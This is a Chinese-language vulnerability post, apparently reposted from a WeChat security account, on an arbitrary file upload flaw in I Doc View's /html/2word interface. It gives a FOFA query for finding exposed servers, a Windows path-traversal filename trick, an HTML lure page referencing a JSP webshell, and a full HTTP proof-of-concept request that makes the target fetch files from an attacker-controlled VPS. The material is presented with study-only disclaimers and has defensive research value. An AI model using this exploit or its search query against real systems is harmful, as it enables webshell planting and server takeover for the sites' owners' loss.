请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习交流使用,如若非法他用,与平台和本文作者无关,需自行负责!
00
漏洞概述
I Doc View /html/2word 接口存在漏洞,导致可下载远程文件至本地服务器,并且可下载并解析恶意JSP文件,导致任意恶意文件上传。
01
空间搜索语法
fofa
title=="在线文档预览 - I Doc View"
02
利用过程
登录界面
VPS上准备如下两个文件
由于系统代码 String filename = path.substring(path.lastIndexOf(47) + 1); 是截取了最后一个 / 所以直接使用 ../ 进行跨目录是不行的
但在windows安装环境下,文件名可设置为“..”跨目录,webshell命名如下
'......docviewtest.jsp'html页面,注意:jsp解析目录在docview下。
<html><head><title>Example Page</title></head><body><h1>Example Page</h1><p>This is an example page containing some useful files for download.</p><ul><link rel="stylesheet" type="text/css" href="/......docviewttt111.jsp"></ul></body></html>
POC如下
GET /html/2word?url=http://IP:PORT/test.html HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeUpgrade-Insecure-Requests: 1
漏洞存在响应如下
03
nuclei
获取脚本关注本公众号后发送:idocview1
✓
关注我们
原文始发于微信公众号(天澜实验室):I Doc View /html/2word 任意文件上传
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论